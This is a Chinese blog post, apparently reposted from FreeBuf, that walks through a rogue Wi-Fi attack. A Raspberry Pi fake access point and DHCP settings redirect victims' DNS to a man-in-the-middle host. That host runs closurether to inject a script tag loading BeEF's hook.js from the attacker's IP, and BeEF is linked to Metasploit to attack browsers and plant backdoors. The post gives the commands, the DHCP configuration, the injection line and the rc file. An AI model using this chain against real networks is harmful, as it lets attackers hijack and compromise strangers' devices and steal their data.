JS投毒的另一种尝试

半个月前看了‍‍‍EtherDream写的那篇wifi流量劫持和JS投毒,随手就在公司实验室里折腾了一下,头一次接触这个领域,感觉挺新鲜的。然后又看到sh4dow@lcx.cc写了一篇《内网DNS投毒技术劫持会话》,我决定把我做的东西也分享一下。

0×01 攻击思路

1、用树莓派建立一个AP,诱使别人过来连接
2、在树莓派里,设定DNS,指向一台代理主机(其实就是中间人)
3、在代理主机上运行closurether,进行JS投毒
4、投毒可以有很多种,closurether的原作者是设计了一个可以截获用户的登陆时候输入的用户名和密码,但是那个链接已
   经失效了,自己又不会写js,所以就改用别的思路。这里我选择了BeEF框架进行配合,在流量中插入hook.js
5、既然BeEF可以配合MSF来攻击浏览器,那这里自然也少不了MSF的戏份

0×02 工具准备

EDUP 迷你USB无线网卡 免驱动 (RTL8188CUS) Raspberry Pi,系统镜像是Raspbian

团队的Summer建议我用TP-Link TL-WR703N 刷一个openWRT,便携而且还可以实现很多其他的功能。

这个想法还没有去尝试,openWRT刷进路由以后,路由就没有任何空间来安装其他的东西了。

0×03 改造树莓派

首先让树莓派运行起来,玩过的人都知道怎么弄,下载镜像,写入镜像,不做赘述。

其次是让树莓派作为一个路由器运行起来

详细的可以看这里:http://www.daveconroy.com/using-your-raspberry-pi-as-a-wireless-router-and-web-server/ 这是使用树莓派建立无线AP的最早一篇文章。这里讲的非常详细,包括原理和具体配置都列举出来了,照着一步步坐下来,不会出太大意外。

这里伪造的wifi是我以前学调酒的那间酒吧用的,我师父是Lavazza的顶级咖啡师。不过那家酒吧关门了……在南京的童鞋如果有兴趣,还是有地方可以让我调酒的。

0×04建立中间人

在JS缓存投毒的文章中,作者给了非常详细的原理解释,并给出了实现代码。 我测试的平台是Mac OS X 10.0(黑苹果),安装简易,没有发生任何状况。

首先需要安装node.js

然后安装closurether

npm install -g closurether

运行closurether

closurether

closurether运行成功的话,就会看到下面的信息(linux下运行closurether需要的权限比较高,windows不能开启其他占用80、443端口的服务)

sudo closurether
 Password: [SYS] local ip: 172.16.6.37 [DNS] running 0.0.0.0:53 [WEB] listening 0.0.0.0:80 [WEB] listening 0.0.0.0:443

这个时候如果设置浏览器的代理指向127.0.0.1:80就可以看到closurether劫持的所有流量,包括DNS解析和http请求 如果你这么做了,不妨在浏览器中查看源码,你会看到源码中已经被植入了一个script标签,这个就是被closurether植入的攻击代码。

为了伪装,把地址写成了http://10086.cn/js10086/201306301200.js

但实际上,10086.cn上可不会有这么个文件….好一手栽赃嫁祸,我是伪装成了google-analytis的站点分析脚本

使用的攻击脚本和伪装都可以在config.json文件中修改

0×05修改DNS

依然已经准备了代理(中间人),那么就需要让流量指向代理,前面说设置浏览器代理可以实现,但最理想的还是作者提供的修改DNS

修改DNS,指向代理服务器,那么所有使用这个wifi上网的人解析域名就都解析到了代理服务器,DNS解析之后,再把http流量也指向代理服务器,就顺理成章的使closurether成为了中间人

在树莓派的DHCP中设置:

subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.1 192.168.1.254;
  option routers 192.168.1.1;
  option domain-name-servers 172.16.6.37;
  interface wlan0;
}

172.16.6.37也就是我本机

那么这个时候,连接到这个wifi的设备进行DNS解析的时候,得到的结果都是172.16.6.37

然后,其他的请求也就都指向了代理。

PS:closurether作者考虑的很周到,js投毒只能针对http或https协议,如果是其他的协议,那么在第二次请求的时候就把真实的DNS请求结果反馈给客户端,这样就不会那么容易被发现了。

0X06 BeEF和MSF

别人的文章里比我写的要清楚,就不多说了 但是目前关于BeEF使用的文章还比较少,还在陆续的挖掘其中的功能。

主要是需要建立BeEF和MSF的协作

使用

msfconsole -r beef.rc

来建立一个MSF的XMLRPC服务,然后BeEF启动以后会自动调用

beef.rc的内容如下:

load xmlrpc ServerHost=<服务器IP> Pass=<密码> ServerType=Web

0×07 把毒药撒向天空,让它随风飘扬(此处应有反派出场的音乐)

closurether中做如下修改:

修改asset/inject/extern.js,在function中增加:

var commandModuleStr = '<script src="http://172.16.6.37:3000/hook.js" type="text/javascript">// <![CDATA[<\/script>';document.write(commandModuleStr);

http://172.16.6.37:3000/hook.js是BeEF的XSS脚本,理论上,这个脚本可以放在任何地方,也可以被closurether直接向流量中注入,还是因为不懂js,没有做过多的尝试。

然后,就等鱼上钩了

接下来就是如何利用BeEF和MSF去攻击浏览器的内容了。

按照closurether作者的思路,被投进去的js脚本会长期保存在用户的电脑里,时间又长有短。可能在未来的某一天,一台设备就突然上线了。

貌似用BeEF控制用户的浏览器去下载一个后门文件,也是可以的。

0×08小结

1、都是前人的东西,只不过组合了一下而已,没有任何穿创新,比较水。

2、hook.js对手机浏览器没有任何效果

3、MSF的漏洞库比较并没有想象中那么强大,想要一举拿下被投毒的电脑,没有几个0day估计是搞不定的

4、忽然对360清空浏览器缓存的功能感到很纠结……

5、用树莓派来实现这个功能,只是为了工作需要,经常出去做一些演讲,用这套设备效果会很好。实战中可能的问题就是,树莓派和中间人服务器,必须有一个能连接互联网。

6、树莓派上安装closurether也有些问题,还没做深入研究。

注:原文在我们团队主页上发表过,这里是重新编辑了一下。

参考资料

把树莓派改造成无线路由器

http://www.daveconroy.com/using-your-raspberry-pi-as-a-wireless-router-and-web-server

JS脚本缓存投毒

http://www.cnblogs.com/index-html/p/wifi_hijack_3.html

BeEF框架搭建和使用

http://blog.csdn.net/emaste_r/article/details/17091067

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2014-09-14

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏落花落雨不落叶

树莓派+花生棒+leanote搭建自己的笔记服务器

39520
来自专栏ytkah

“我的小程序”来了 新版微信v6.7.1下拉就能找到

  今天iOS版微信迎来v6.7.1正式版发布,本次升级主要是可以把常用的小程序添加到“我的小程序”。近期版本微信可以直接浏览订阅号的消息,扫一扫可拍照翻译整页...

8420
来自专栏编程软文

程序员常用软件,你用了哪些

30350
来自专栏北京马哥教育

干货:Web应用上线之前程序员应该了解的技术细节

问题 Web 应用上线前,程序员应考虑哪些技术细节呢? 如果 Jeff Atwood 忘记把 HttpOnly cookies、sitemaps 和 cros...

35950
来自专栏腾讯Bugly的专栏

微信文件微起底

微信大家都在用,但微信的本地文件到底隐藏着什么样的信息呢?我们怎么可以把长得都一样的微信,变的跟别人的不一样,来个专业定制 100 年呢?这个是一个让大家的微信...

33240
来自专栏DevOps时代的专栏

这些工具都没用过?还谈什么 DevOps

导语: DevOps 越来越流行,越来越成为加快产品研发速度、提升团队效率的有效工具。现在,在开发、测试、部署、交付、维护以及监控分析等工作中,有越来越多的开源...

425150
来自专栏施炯的IoT开发专栏

Windows 10 IoT Serials 7 – 如何用树莓派制作家庭流媒体播放器

    Windows 10平台引入了AllJoyn开源软件框架,它提供了一组服务可以创建动态近端网络,让设备可以相互连接实现功能交互。目前,AllJoyn开源...

577100
来自专栏数据和云

五重备份无一有效,还有哪些 rm -rf 和GitLab类似的忧伤?

DBA的悲伤,不是没有做备份,就是没有做有效的备份。日光之下,并无鲜事。 都说一个没有删过数据库的DBA,职业生涯是不完整的,不过当你删过之后,你的DBA生涯可...

43750
来自专栏双十二技术哥

Android性能优化(六)之卡顿那些事

对普通用户而言,类如内存占用高、耗流量、耗电量等性能问题可能不会轻易发现,但是卡顿问题用户一定会立马直观的感受到。本文就带你一览卡顿的发生、检测、及优化。

17920
来自专栏FreeBuf

趋势OfficeScan系列产品漏洞分析

作者 Shadowkeeper OfficeScan是趋势科技开发的一套专为网路环境的桌上型电脑和行动用户端所提供的即时、全面的防毒解决方案。安全公司Silen...

26680

扫码关注云+社区

领取腾讯云代金券